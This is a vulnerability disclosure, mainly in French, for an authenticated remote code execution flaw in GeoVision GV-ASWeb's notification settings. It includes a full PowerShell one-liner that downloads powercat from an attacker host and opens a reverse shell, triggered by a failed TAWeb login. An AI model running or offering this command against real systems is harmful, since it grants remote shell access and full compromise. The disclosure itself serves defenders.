
CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.
CVE-2025-26264 - GeoVision GV-ASWeb version 6.1.2.0 ou inférieure contient une vulnérabilité d'exécution de code à distance (RCE) dans sa fonctionnalité Notification Settings. Un attaquant authentifié disposant des privilèges "System Settings" dans ASWeb peut exploiter cette faille pour exécuter des commandes arbitraires sur le serveur, entraînant une compromission totale du système.
Pour qu'une attaque réussisse, un attaquant doit disposer de :
La vulnérabilité peut être exploitée pour réaliser les actions non autorisées suivantes :
L'exploitation de la vulnérabilité d'exécution de code à distance dans la plateforme ASWeb de GeoVision GV-ASManager est possible sur les versions 6.1.2.0 ou inférieures (aucun correctif n'est disponible au 26 février 2025).
La fonction Notification Setting d'ASWeb de GeoVision ASManager est vulnérable à l'exécution de code à distance (RCE)
Requête HTTP de configuration d'une notification sur un événement spécifique : tentative de connexion TAWeb échouée
Selon ce script, s'il y a une tentative de connexion TAWeb échouée, le script PowerShell suivant sera exécuté :
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Une tentative d'authentification échouée dans TAWeb
Hôte de la victime : le script ouvre une porte dérobée vers l'hôte de l'attaquant.
Hôte de l'attaquant : l'attaquant obtient un shell
Si vous avez une question, vous pouvez me contacter, Giorgi Dograshvili, sur LinkedIn.